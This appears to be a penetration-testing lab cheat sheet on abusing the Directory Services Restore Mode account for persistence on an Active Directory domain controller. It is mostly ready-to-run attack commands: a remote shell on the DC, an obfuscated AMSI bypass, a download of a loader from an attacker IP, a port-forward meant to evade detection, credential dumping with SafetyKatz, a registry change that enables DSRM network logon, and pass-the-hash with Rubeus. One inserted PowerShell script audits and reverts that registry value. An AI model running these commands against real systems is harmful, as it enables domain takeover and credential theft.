
# DSRM Abuse

**DSRM (Directory Services Restore Mode) Abuse** is a technique used by attackers to gain privileged access to a Domain Controller (DC) by abusing the **Directory Services Restore Mode** account, which is a local administrator account created during the installation of **Active Directory (AD)**.

* Once we hold Domain Admin privileges, we can persist with administrative access on the DC by abusing the DSRM administrator. With the domain admin privileges obtained earlier, run the following command to open a remote shell on the DC. As always, remember that we could use other tools such as SafetyKatz, BetterSafetyKatz, etc.

```
winrs -r:dcorp-dc cmd
```

* Bypass AMSI

```
S`eT-It`em ( 'V'+'aR' +  'IA' + (('b'+("{1}{0}"-f':1','lE'))+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f(('U'+'ti')+'l'),'A',('Am'+'si'),(('.'+'Man')+('ag'+'e')+('me'+'n')+'t.'),('u'+'to'+(("{1}{0}"-f 'io','mat')+'n.')),'s',(('Sys'+'t')+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+('ms'+'i')),'d',('I'+('n'+'itF')+('a'+'ile'))  ),(  "{2}{4}{0}{1}{3}" -f ('S'+('t'+'at')),'i',(('N'+'on')+('Pu'+'bl')+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
```

* Download Loader.exe

```
iwr -UseBasicParsing http://172.16.100.89/Loader.exe -Outfile C:\Users\Public\Loader.exe
```

* Add a port-forwarding rule to avoid detection

```
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.89
```

* Run the command below to dump the Administrator hash

```
c:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe "lsadump::lsa /patch" "exit"
```

* By default the DSRM administrator is not allowed to log on to the DC over the network, so we need to change the logon behaviour for the account by modifying the registry on the DC. A `DsrmAdminLogonBehavior` value of 2 allows the account to log on at any time (1 would allow it only while AD DS is stopped). We can do this as follows:

```
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
```
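From the defender's side, the registry change above is the artefact worth hunting for: the value does not exist on a healthy DC, and any non-zero setting means the DSRM account can be used over the network. The following script is an added audit example, not code from the original page; it assumes the ActiveDirectory module is available, that the caller has local administrator rights on every DC, and that WinRM is reachable. It reads `DsrmAdminLogonBehavior` on each DC, flags non-zero values, and removes the value when run with `-Remediate`.

```powershell
# Added audit/remediation example (not part of the original page).
# Assumes: ActiveDirectory module installed, WinRM open to the DCs,
# and the caller is an administrator on each DC.
param(
    [switch]$Remediate
)

$key  = 'HKLM:\System\CurrentControlSet\Control\Lsa'
$name = 'DsrmAdminLogonBehavior'

# Runs on each DC. Meaning of the value:
#   missing / 0 = DSRM account usable only in Directory Services Restore Mode (default)
#   1           = usable while the AD DS service is stopped
#   2           = usable at any time, including over the network (the abuse setting)
$check = {
    param($key, $name, $fix)

    $value = (Get-ItemProperty -Path $key -Name $name -ErrorAction SilentlyContinue).$name
    if ($null -eq $value) { $value = 0 }

    $result = [pscustomobject]@{
        Computer = $env:COMPUTERNAME
        Value    = $value
        Risky    = ($value -ne 0)
        Fixed    = $false
    }

    # Deleting the value restores the default behaviour (equivalent to 0).
    if ($fix -and $value -ne 0) {
        Remove-ItemProperty -Path $key -Name $name -ErrorAction Stop
        $result.Fixed = $true
    }

    $result
}

# Enumerate every DC in the current domain and run the check on all of them.
$dcs = (Get-ADDomainController -Filter *).HostName
$findings = Invoke-Command -ComputerName $dcs -ScriptBlock $check `
            -ArgumentList $key, $name, $Remediate.IsPresent

$findings | Sort-Object Computer | Format-Table Computer, Value, Risky, Fixed -AutoSize
```

Run it without `-Remediate` first to get an inventory, then again with `-Remediate` once the findings have been reviewed. To catch the change as it happens rather than on the next audit, put a SACL on the `Lsa` key so that writes raise event 4657 (registry value modified) on the DC, and forward that event together with 4794 (an attempt was made to set the DSRM administrator password), which fires when the DSRM password is reset.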

* Pass-the-hash (PtH) to get access to the DC

```
Rubeus.exe asktgt /user:administrator /rc4:af0686cc0ca8f04df42210c9ac980760 /domain:dollarcorp.moneycorp.local /dc:dcorp-dc /ptt
```

